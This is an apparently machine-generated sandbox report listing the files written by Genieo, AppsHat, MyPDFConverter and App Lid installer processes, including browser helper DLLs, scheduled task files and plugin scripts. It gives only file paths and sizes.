C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\slf4j-api-1.6.0.jar (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\Info.plist (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\all_misc.stop (38 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\cssparser-0.9.5.jar (9320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\tray_icons_mac\tray_mac_disabled.png (421 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_anabel.stop (319 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_date_time.stop (499 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\defaultPortals.xml (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\log4j-1.2.15.jar (13368 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\commons-logging-1.1.1.jar (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\ro_topwords.txt (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\defaultFeeds.xml (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\genieoLogo24.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\readme.txt (610 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\httpcore-4.2.jar (8184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\slf4j-log4j12-1.6.0.jar (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\es_merged_stemmed.stop (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\es_topwords.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_numbers_and_currencies.stop (78 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\hu_topwords.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\log4j_release_mac.properties (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\restfb-1.6.12.jar (10136 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\ru_stops_stemmed2.stop (892 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\httpmime-4.2.jar (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_stops_stemmed_new.stop (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\sitelang.txt (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\tray_icons_mac\tray_mac_new_items.png (343 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\protostuff-collectionschema-1.0.1.jar (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\product_domains.txt (571 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\ru_merged_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\log4j_release.properties (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\tr_topwords.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\it_topwords.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\fr_lang.properties (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\it_merged_stemmed.stop (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\hu_stops_stemmed.stop (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\all_ToBeAddedToStop.stop (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\pt_stops_stemmed_v0.stop (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\engine.properties (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\engine.jar (65930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\zombie_icon.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\fr_merged_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_ob_withadult.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\log4j_dev.properties (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\sv_topwords.txt (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_date_time.stop (342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\de_merged_stemmed2.stop (347 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\fr_top_500_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_tmp_template_all.txt (176 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\fr_topwords.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\apache-mime4j-0.6.jar (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\pt_stops_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\fi_topwords.txt (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\JGoogleAnalyticsTracker-1.2.1-SNAPSHOT.jar (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\lucene-snowball-3.0.0.jar (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\isgenieoalive.dat (198 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\gad_categories_multilingual.txt (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\tray_icons_mac\tray_mac.png (333 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\en_top_1000_draft.txt (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\signpost-core-1.2.1.1.jar (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\jdom.jar (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\explicit\explicit_content.dat (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\engine_tray_icon.png (723 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\en_lang.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqE2D1.tmp (300445 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\no_stops_stemmed.stop (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\bin\debugInfoCollector.exe (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\pt_stops_more.stop (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\explicit\explicitList.dat (491 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\pt_topwords.txt (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\ru_lang.properties (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\sv_stops_stemmed.stop (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\default.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\de_topwords.txt (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\explicit\bannedListByURL.dat (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqE2D2.tmp\NSISdl.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_25nouns_wiki.stop (169 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_stops_stemmed3.stop (357 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\fr_stops_stemmed2.stop (395 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\origin\ru_lang.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\genieutils.exe (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\preset_feeds.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\cluto_wrapper.properties (942 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\json.jar (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\httpclient-4.2.jar (14184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\no_topwords.txt (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_mapping.txt (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\fi_stops_stemmed.stop (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\amazon_ad_api.jar (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_morestops.stop (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\protostuff-api-1.0.1.jar (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_general.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\fr_top_1000_draft.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\de_top_100_draft.txt (582 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\ro_stops_stemmed.stop (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\all_explicit.stop (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_ob.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\jericho-html-3.1.jar (6360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_articlebase.txt (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\bin\genieo.l4j.ini (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\it_stops_stemmed2.stop (473 bytes)
The process InstallGenieo.exe:4052 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqB000.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqAFFF.tmp (33533 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\genieo_temp\InstallGenieo.exe (18368 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\genieo_temp\genieo_setup.exe (16903 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\partner_uninstall.exe (1552 bytes)
The process InstallGenieo.exe:1660 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\MozillaHistoryView\readme.txt (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JDOM_FAQ.htm (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\Jericho HTML Parser.htm (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JDIC_Plus_index.html (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JavaMail_SMTP.txt (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JettyNOTICE.txt (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\TrayUi\bin\gentray.exe (18964 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JavaMail API Reference Implementation  Project Kenai.htm (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsfB8E5.tmp\fct.dll (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\License - jQuery JavaScript Library.htm (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\uninstall\Elevate.exe (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\iehv\iehv.chm (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsfB8E5.tmp\KillProcDLL.dll (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\IeSearchProvider.exe (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\OpenSorcePackagesInUse.txt (295 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\conf\conf.ini (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\Launch4j - Cross-platform Java executable wrapper.htm (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\iehv\readme.txt (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\oauth-signpost - Project Hosting on Google Code.htm (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\license.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\TrayUi\conf\conf.ini (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsfB8E4.tmp (32607 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\reallysimplehistory - Project Hosting on Google Code.htm (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\uninstall\updater_uninstall.exe (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\IE HistoryView Freeware Internet Explorer History Viewer.htm (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\Apache log4j 1.2 - Project License.htm (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\MozilaHistoryViewbrowsers.htm (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\prepenv_setup.exe (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\conf\updater_manifest.xml (297 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\MozillaHistoryView\MozillaHistoryView.chm (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\SQLite Copyright.htm (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\Licenses.htm (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\firsttime_setup.exe (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\genupdater.exe (10430 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\LicenseAgreement.txt (784 bytes)
The process cscript.exe:3120 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\scripts\default_config.json (791 bytes)
C:\Users\"%CurrentUserName%"\Desktop\AppsHat.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\config[1].json (778 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\scripts\config.xml (819 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\Uninstall.exe (65 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AppsHat\Uninstall.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\WebPlayer.exe (204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AppsHat\AppsHat.lnk (2 bytes)
The process MsiExec.exe:3588 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Windows\Installer\MSI6613.tmp (520 bytes)
%Program Files% (x86)\MyPDFConverter\setup\Setup.exe (53 bytes)
C:\Windows\Installer\MSIFE02.tmp (520 bytes)
The process MsiExec.exe:1612 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI2648.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI6B2B.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI605F.tmp (262 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI6A40.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI373A.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI5FD2.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI485.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI5FB2.tmp (520 bytes)
The process genupdater.exe:3144 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\genieo_temp\framework_setup.gen (1026190 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\upgrade\updater_manifest.xml (297 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\genieo_temp\genieo_setup.gen (62942 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\conf\updater_manifest.xml (297 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\genieo_temp\trayapp_setup.gen (201149 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\upgrade\partner_manifest.xml (550 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\log\Updater.log (11205 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\upgrade\manifest.xml (644 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\conf\partner_manifest.xml (550 bytes)
The process Vlwgfsqfpaz.exe:3296 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\281.js (485 bytes)
C:\Windows\Tasks\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-5.job (74 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\36.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\InstallerUtils.dll (28539 bytes)
%Program Files% (x86)\App Lid\App Lid-bho.dll (4545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\182.js (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\288.js (553 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\14.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\234.js (1 bytes)
%Program Files% (x86)\App Lid\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-4.exe (8330 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\78.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\nsisos.dll (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\userCode\extension.js (354 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\46.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\253.js (737 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\64.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\38.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\180.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2BA3.tmp (718555 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\2.js (63 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\StdUtils.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\41.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\91.js (6584 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\345.js (607 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\ExecDos.dll (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\InstallerUtils2.dll (3410 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\207.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-4.dll (46278 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\183.js (2 bytes)
%Program Files% (x86)\App Lid\App Lid-buttonutil64.dll (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\176142 (17985 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\354.js (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\37.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\301.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\252.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\22.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\150014 (243819 bytes)
%Program Files% (x86)\App Lid\App Lid-buttonutil64.exe (2105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\223.js (825 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\45.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\21.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\4.js (3312 bytes)
%Program Files% (x86)\App Lid\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-5.exe (7433 bytes)
%Program Files% (x86)\App Lid\background.html (729 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\ipgeoapi_com[1].json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\43.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\263.js (1 bytes)
%Program Files% (x86)\App Lid\utils.exe (90899 bytes)
%Program Files% (x86)\App Lid\App Lid-codedownloader.exe (8319 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\17.js (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\242.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\177.js (784 bytes)
C:\Windows\Tasks\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-5_user.job (74 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\184.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\7.js (685 bytes)
%Program Files% (x86)\App Lid\11a9fc6b-cfbc-4d3c-943b-7e1062933d01.xpi (2321 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\28.js (536 bytes)
%Program Files% (x86)\App Lid\App Lid-bho64.dll (5873 bytes)
